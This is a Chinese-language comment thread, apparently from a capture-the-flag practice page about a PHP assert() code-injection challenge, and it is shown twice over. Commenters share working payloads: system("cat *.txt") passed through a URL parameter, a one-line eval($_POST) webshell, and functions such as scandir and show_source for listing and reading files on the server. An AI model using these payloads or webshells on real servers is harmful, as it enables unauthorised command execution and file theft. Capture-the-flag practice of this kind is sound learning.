?s=system("cat *.txt")
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)
...没那么复杂啊,我直接s=system("")
除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。
解法还是很多的
命令执行了
哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗
assert()代码执行漏洞
我是肖彪
@biaoxiao 我是流汗了
嗯 你说得对
...
评论
eleven 3年前
举报
?s=system("cat *.txt")
naihe567 3年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
mantou 3年前
举报
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)
Y1rannn 3年前
举报
...没那么复杂啊,我直接s=system("")
pest 3年前
举报
除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。
simpleboy 3年前
举报
解法还是很多的
simpleboy 3年前
举报
命令执行了
三分踯躅 3年前
举报
哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗
GGBond9527 3年前
举报
assert()代码执行漏洞
xiaotan451 3年前
举报
我是肖彪
xiaotan451 3年前
举报
@biaoxiao 我是流汗了
biaoxiao 3年前
举报
嗯 你说得对